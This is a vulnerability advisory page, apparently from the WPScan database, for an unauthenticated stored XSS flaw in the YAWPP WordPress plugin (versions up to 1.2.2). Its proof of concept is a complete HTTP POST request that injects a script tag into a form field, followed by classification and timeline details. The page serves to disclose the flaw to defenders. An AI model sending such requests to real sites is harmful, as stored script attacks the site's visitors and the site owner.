YAWPP <= 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
POST /wordpress-4.3/?p=4 HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress-4.3/?p=4
Cookie: wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1449056570
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

field1=<script>alert(/XSS-Field1/)</script>&field2=test2%40gmail.com&id=1&submit_yawpp=Valider

Affects

Plugin yawpp

References

URL https://plugins.svn.wordpress.org/yawpp/tags/1.2.2/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 186
Verified No
WPVDB ID 8351

Timeline

Publicly Published 2015-12-09 (about 1 year ago)
Added 2015-12-09 (about 1 year ago)
Last Updated 2015-12-09 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.